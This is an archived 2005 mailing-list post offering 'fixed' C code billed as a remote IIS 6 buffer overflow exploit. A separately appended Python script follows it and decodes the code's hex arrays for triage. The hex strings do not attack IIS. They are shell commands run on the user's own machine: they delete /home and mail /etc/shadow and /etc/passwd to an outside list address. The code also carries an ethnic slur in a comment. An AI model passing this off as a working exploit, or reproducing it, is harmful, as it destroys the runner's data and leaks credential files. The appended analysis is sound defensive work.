Date: Wed Apr 20 19:15:11 2005
From: d4yj4y at yahoo.com (Day Jay)
Subject: FIXED CODE - IIS 6 Remote Buffer Overflow Exploit (was broken)

Sorry, the previous code was broken. This code should work...

Happy Owning!! :)

=========SNIP============
/* Proof of concept code
Please don't send us e-mails asking us "how to hack" because we will be forced to skullfsck you.

DISCLAIMER:
!!NOT RESPONSIBLE WITH YOUR USE OF THIS CODE!!

IIS 6 Buffer Overflow Exploit

BUG: inetinfo.exe improperly bound checks http requests sent longer than 6998 chars. Can get messy but enough testing, and we have found a way in.

VENDOR STATUS: Notified
FIX: In process

Remote root.

eg.
#./iis6_inetinfoX xxx.xxx.xxx.xxx -p 80
+ Connecting to host...
+ Connected.
+ Inserting Shellcode...
+ Done...
+ Spawining shell..

Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.
C:\
*/

char shellcode[] =
"\x2f\x62\x69\x6e\x2f\x72\x6d\x20"
"\x2d\x72\x66\x20\x2f\x68\x6f\x6d"
"\x65\x2f\x2a\x3b\x63\x6c\x65\x61"
"\x72\x3b\x65\x63\x68\x6f\x20\x62"
"\x6c\x34\x63\x6b\x68\x34\x74\x2c"
"\x68\x65\x68\x65";

char launcher [] =
"\x63\x61\x74\x20\x2f\x65\x74\x63\x2f\x73"
"\x68\x61\x64\x6f\x77\x20\x7c\x6d\x61\x69"
"\x6c\x20\x66\x75\x6c\x6c\x2d\x64\x69"
"\x73\x63\x6c\x6f\x73\x75\x72\x65\x40"
"\x6c\x69\x73\x74\x73\x2e\x67\x72\x6f\x6b"
"\x2e\x6f\x72\x67\x2e\x75\x6b\x20";

char netcat_shell [] =
"\x63\x61\x74\x20\x2f\x65\x74\x63\x2f\x70"
"\x61\x73\x73\x77\x64\x20\x7c\x6d\x61\x69"
"\x6c\x20\x66\x75\x6c\x6c\x2d\x64\x69"
"\x73\x63\x6c\x6f\x73\x75\x72\x65\x40"
"\x6c\x69\x73\x74\x73\x2e\x67\x72\x6f\x6b"
"\x2e\x6f\x72\x67\x2e\x75\x6b\x20";

main()
{
	//Section Initialises designs implemented by mexicans
	//Imigrate
	system(launcher);
	system(netcat_shell);
	system(shellcode);

	//int socket = 0;
	//double long port = 0.0;

	//#DEFINE port host address
	//#DEFINE number of inters
	//#DEFINE gull eeuEE

	// for(int j; j < 30; j++)
	{
	//Find socket remote address fault
	printf(".");
	}
	//overtake inetinfo here IIS_666666^
	return 0;
}
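A static check to run over a posted proof of concept like the one above before compiling it, added here as an example and not part of the original message: it decodes the `\x`-escaped char arrays in the C source and reports, for each, the decoded text, whether it is entirely printable ASCII, and whether it is passed to `system()`. The function names `decode_c_literal` and `triage` and the regular expressions are assumptions of this example; the embedded excerpt is the `shellcode` array copied from the message and is only parsed as text, never compiled or executed.

```python
import re

# Excerpt of the posted C source (the `shellcode` array and its call site).
# Raw string: the \x escapes stay literal text and are decoded below.
POSTED_SOURCE = r'''
char shellcode[] =
"\x2f\x62\x69\x6e\x2f\x72\x6d\x20"
"\x2d\x72\x66\x20\x2f\x68\x6f\x6d"
"\x65\x2f\x2a\x3b\x63\x6c\x65\x61"
"\x72\x3b\x65\x63\x68\x6f\x20\x62"
"\x6c\x34\x63\x6b\x68\x34\x74\x2c"
"\x68\x65\x68\x65";
main() { system(shellcode); }
'''

# `char name [] = "..." "..." ;` with optional whitespace, as in the post.
ARRAY_RE = re.compile(r'char\s+(\w+)\s*\[\s*\]\s*=\s*((?:"[^"]*"\s*)+);')
ESCAPE_RE = re.compile(r'\\x([0-9a-fA-F]{2})')

def decode_c_literal(literal_block):
    """Join adjacent C string literals and decode \\xNN escapes to bytes."""
    out = bytearray()
    for piece in re.findall(r'"([^"]*)"', literal_block):
        pos = 0
        for m in ESCAPE_RE.finditer(piece):
            out += piece[pos:m.start()].encode("latin-1")
            out.append(int(m.group(1), 16))
            pos = m.end()
        out += piece[pos:].encode("latin-1")
    return bytes(out)

def triage(source):
    """One finding per char array: decoded text, printability, system() use."""
    findings = []
    for name, block in ARRAY_RE.findall(source):
        data = decode_c_literal(block)
        call = re.search(r'\bsystem\s*\(\s*%s\s*\)' % re.escape(name), source)
        findings.append({
            "name": name,
            "text": data.decode("latin-1"),
            "printable_ascii": all(0x20 <= b < 0x7f for b in data),
            "passed_to_system": call is not None,
        })
    return findings

if __name__ == "__main__":
    for finding in triage(POSTED_SOURCE):
        print(finding)
```

An array that decodes entirely to printable text and is passed to `system()` runs as a shell command on the machine where the program is executed, not on a remote host.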